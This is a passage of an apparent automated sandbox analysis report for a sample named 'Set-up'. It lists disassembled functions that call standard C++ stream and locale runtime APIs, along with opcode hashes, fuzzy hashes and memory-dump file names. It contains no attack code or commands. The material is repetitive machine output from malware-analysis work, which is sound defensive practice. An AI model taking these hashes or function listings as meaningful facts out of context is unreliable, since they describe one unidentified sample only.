                                                                                              • Opcode ID: 8e4797ae3f2d86c8bdb1267aaeebaba94da9b541b1f13b968e0939c58cb90797
                                                                                              • Instruction ID: 149d2d087ce6caa8979315b03062dbd0309384ea090b03cb7b46aba892db4284
                                                                                              • Opcode Fuzzy Hash: 8e4797ae3f2d86c8bdb1267aaeebaba94da9b541b1f13b968e0939c58cb90797
                                                                                              • Instruction Fuzzy Hash: A621AC71A11208AFCB04CFA8C991EDDFBB9AF18308F24405DE142B7281EB799F44DB60
                                                                                              Function 6BC2CC02 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CC09
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2CC28
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2CC46
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2CCAA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 6a19540c453afb357a09eb1f99bc875285f822648656c8133b4c6782b1046b09
                                                                                              • Instruction ID: 86f23aecfc7c49b7a5ce874b6f3ba2b6aca465b98b1c771715450e1f158a8046
                                                                                              • Opcode Fuzzy Hash: 6a19540c453afb357a09eb1f99bc875285f822648656c8133b4c6782b1046b09
                                                                                              • Instruction Fuzzy Hash: 8B217C71A15108AFCB05CFE8C991EEDBBB5AF58308F24405DE142B7291EB799F44DB60
                                                                                              Function 6BC2EC0F Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EC16
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EC35
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EC53
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2ECB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 49db08d202becd367cd2726563bf3def4811dcc0a4b196ae26f6a8d7124b462a
                                                                                              • Instruction ID: ca3a6f7626f63ae748090f367a9bd5950995501bef9b70ed88c5c62f786d6b11
                                                                                              • Opcode Fuzzy Hash: 49db08d202becd367cd2726563bf3def4811dcc0a4b196ae26f6a8d7124b462a
                                                                                              • Instruction Fuzzy Hash: 0A216A71A15108AFCB05CFA8C991AEDBBB9AF58308F244059E142B7291EB799B44DB60
                                                                                              Function 6BC2BC1D Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BC24
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BC43
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BC61
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BCC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: 22bf19ef1a86ffa8326b3c4cd2146598bf9ab05b0e8e88c6b81265bc520641f1
                                                                                              • Instruction ID: 2b633436f24f87c10ff7cd8b7f505ac17b1bfdd38b46887f4c28506dec12b362
                                                                                              • Opcode Fuzzy Hash: 22bf19ef1a86ffa8326b3c4cd2146598bf9ab05b0e8e88c6b81265bc520641f1
                                                                                              • Instruction Fuzzy Hash: 24219A71A11108AFCB04CFA8C991ADDFBB5AF18308F244059E142B7281EB799B44DB60
                                                                                              Function 6BC2B3BE Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B3C5
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2B3E4
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2B402
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2B466
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: 06feb5ef34edd23a83d0bb6fc3c74bcc382d7d35a4a6f4e384175be59dc5228e
                                                                                              • Instruction ID: 9fb6d2bb88c1aec6f09195e369a48fb0eabb3669babe12d951a3e9db9e23a615
                                                                                              • Opcode Fuzzy Hash: 06feb5ef34edd23a83d0bb6fc3c74bcc382d7d35a4a6f4e384175be59dc5228e
                                                                                              • Instruction Fuzzy Hash: AF21AC71A11108AFCB04CFA8C991EDDBBB5AF18308F244059E142B7281EB799F44DB60
                                                                                              Function 6BC2D35A Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D361
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2D380
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2D39E
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2D402
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 9ceddc909a81a05e4dab9d4a0f6bb00c5c0b72161f791dc31a1c10cbb3eb180c
                                                                                              • Instruction ID: 7ab15031f6b79f83e36a5377462c2f77e8c286aee196b71a036e2304bd07bed5
                                                                                              • Opcode Fuzzy Hash: 9ceddc909a81a05e4dab9d4a0f6bb00c5c0b72161f791dc31a1c10cbb3eb180c
                                                                                              • Instruction Fuzzy Hash: E821AC71A11108AFCB04CFA8C981EEDBBB5AF18308F244099E142B7291EB399F04DB60
                                                                                              Function 6BC2D253 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D25A
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2D279
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2D297
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2D2FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: c0c10d1358bfa0c9f094ca3ffe5488c551c91851127cb5f124db51b06c1b88d1
                                                                                              • Instruction ID: a888e118c17ed9e69b1cd986dd9c856968afb76064fb69bfbc753128126d0667
                                                                                              • Opcode Fuzzy Hash: c0c10d1358bfa0c9f094ca3ffe5488c551c91851127cb5f124db51b06c1b88d1
                                                                                              • Instruction Fuzzy Hash: A9217C71A15108AFCB05CFA8C991FEDBBB5AF58308F244059E142B7291EB799F44DB60
                                                                                              Function 6BC2E27E Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E285
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2E2A4
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2E2C2
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2E326
                                                                                              Memory Dump Source
